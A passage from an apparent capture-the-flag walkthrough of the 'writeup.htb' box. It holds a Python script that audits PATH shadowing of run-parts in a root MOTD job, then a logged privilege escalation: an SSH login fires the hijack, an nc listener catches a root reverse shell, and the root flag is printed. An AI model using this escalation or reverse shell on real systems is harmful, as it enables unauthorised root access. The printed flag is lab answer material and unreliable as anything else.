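    return {"command": command, "resolved": resolved, "shadowing": shadowing}

def build_constructed_tree():
    """Constructed stand-in for the box: writable /usr/local/{sbin,bin}, real /bin/run-parts."""
    root = tempfile.mkdtemp()
    for d in ("usr/local/sbin", "usr/local/bin", "usr/sbin", "usr/bin", "sbin", "bin"):
        os.makedirs(os.path.join(root, d))
    for d in ("usr/local/sbin", "usr/local/bin"):
        os.chmod(os.path.join(root, d), 0o2775)   # group-writable, like group staff on Debian
    real = os.path.join(root, "bin", "run-parts")
    with open(real, "w") as f:
        f.write("#!/bin/sh\n")
    os.chmod(real, 0o755)
    return root

# Command line exactly as pspy printed it in the session above.
PSPY_LINE = ("sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:"
             "/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d "
             "> /run/motd.dynamic.new")

if __name__ == "__main__":
    path_value, command = parse_env_invocation(PSPY_LINE)
    print(audit_path_for_command(command, path_value, root=build_constructed_tree()))
```

Run against the live system with the default root="/" from an unprivileged audit account; an empty shadowing list for every root cron and MOTD command is the state a hardened box should show.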

When I tried to connect to the machine over SSH again:

┌──(root💀kali)-[~]
└─# ssh [email protected]
[email protected]'s password: 

The reverse shell arrives on my port 1234.

┌──(root💀kali)-[/opt]
└─# nc -lvp 1234
listening on [any] 1234 ...
connect to [10.10.14.21] from writeup.htb [10.10.10.138] 52400
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls
ls
bin  root.txt
# cat root.txt
cat root.txt
5fd505e0c8af615cf7f6c36d60ee5276
Category: Walkthrough
